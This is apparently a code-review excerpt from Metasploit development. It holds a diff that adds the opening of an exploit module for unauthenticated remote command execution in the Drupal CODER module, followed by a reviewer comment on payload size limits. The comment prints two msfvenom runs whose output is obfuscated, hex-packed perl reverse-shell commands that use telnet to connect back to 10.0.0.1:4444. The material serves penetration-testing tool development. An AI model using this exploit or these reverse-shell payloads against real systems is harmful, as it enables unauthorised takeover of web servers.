modules/exploits/unix/webapp/drupal_coder_exec.rb

```diff
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal CODER Module Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a Remote Command Execution vulnerability in
+        Drupal CODER Module. Unauthenticated users can execute arbitrary command
+        under the context of the web server user.
+
+        CODER module doesn't sufficiently validate user inputs in a script file
+        that has the php extension. A malicious unauthenticated user can make
+        requests directly to this file to execute arbitrary command.
+        The module does not need to be enabled for this to be exploited
+
+        This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nicky Bloor',                         # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.drupal.org/node/2765575']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x2f",
+          'Compat'         =>
+            {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'netcat netcat-e'
```

Comment:
My calculation was right but I made a typo on PR description. Max lenght is 240. @brandonprry Doesn't telnet  payloads generate  more than 250 byte even with smallest LHOST (10.0.0.1) address ? I can add them but I believe we will see `No encoders encoded the buffer successfully.` due to `'Space' => 240` limitation.
```
~ msfvenom -p cmd/unix/reverse LHOST=10.0.0.1 LPORT=4444 -b '\x00\x2f'
Payload size: 269 bytes
perl -e 'system(pack(qq,H232,,qq,7368202d63202728736c65657020343432307c74656c6e65742031302e302e302e3120343434347c7768696c65203a203b20646f20736820262620627265616b3b20646f6e6520323e26317c74656c6e65742031302e302e302e312034343434203e2f6465762f6e756c6c20323e263120262927,))'
```
reverse_ssl_double_telnet
```
~ msfvenom -p cmd/unix/reverse_ssl_double_telnet LHOST=10.0.0.1 LPORT=4444 -b '\x00\x2f'
Payload size: 281 bytes
perl -e 'system(pack(qq,H244,,qq,7368202d63202728736c65657020343336357c74656c6e6574202d7a2031302e302e302e3120343434347c7768696c65203a203b20646f20736820262620627265616b3b20646f6e6520323e26317c74656c6e6574202d7a2031302e302e302e312034343434203e2f6465762f6e756c6c20323e263120262927,))'
```